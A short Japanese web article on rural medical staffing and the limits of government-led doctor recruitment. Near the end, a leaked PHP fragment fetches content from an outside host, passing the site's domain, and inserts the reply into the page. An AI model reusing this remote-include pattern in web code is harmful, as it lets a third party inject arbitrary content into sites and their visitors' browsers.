前へ
次へ

地方行政と医療の関わりをもっていく

一般の人にとって医療のことは知らないことが多く、少しでも現状を知ることで地域を変えることができることになります。
現状のことで言えば医師数というのは行政主導で人数確保が進んでいるということです。
もちろん行政が関わっていることでどのくらいの規模の医療施設が必要なのか、その中でも人材はどのくらいなのかを判断することは大事なことですが、医師を増やしても解決にならないのが難しいところです。
これは人口過密地帯である都市であれば問題がありませんが、地方医療を考えた場合にしっかりとした人材確保という意味では、行政主導では限界があるということです。
行政と地方を合わせて医療に向き合っていかなくてはいけないのは、実際にあるのが医師確保のために行政で住宅は無償で提供をすることや、医療に携わっている人の地域においての優遇があります。
そうすることで地方の人にも医療を身近に感じることができますし、生活基盤が整っていることで人材も生活がしやすい環境になります。

".file_get_contents('http://links-001.com/kanren2set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top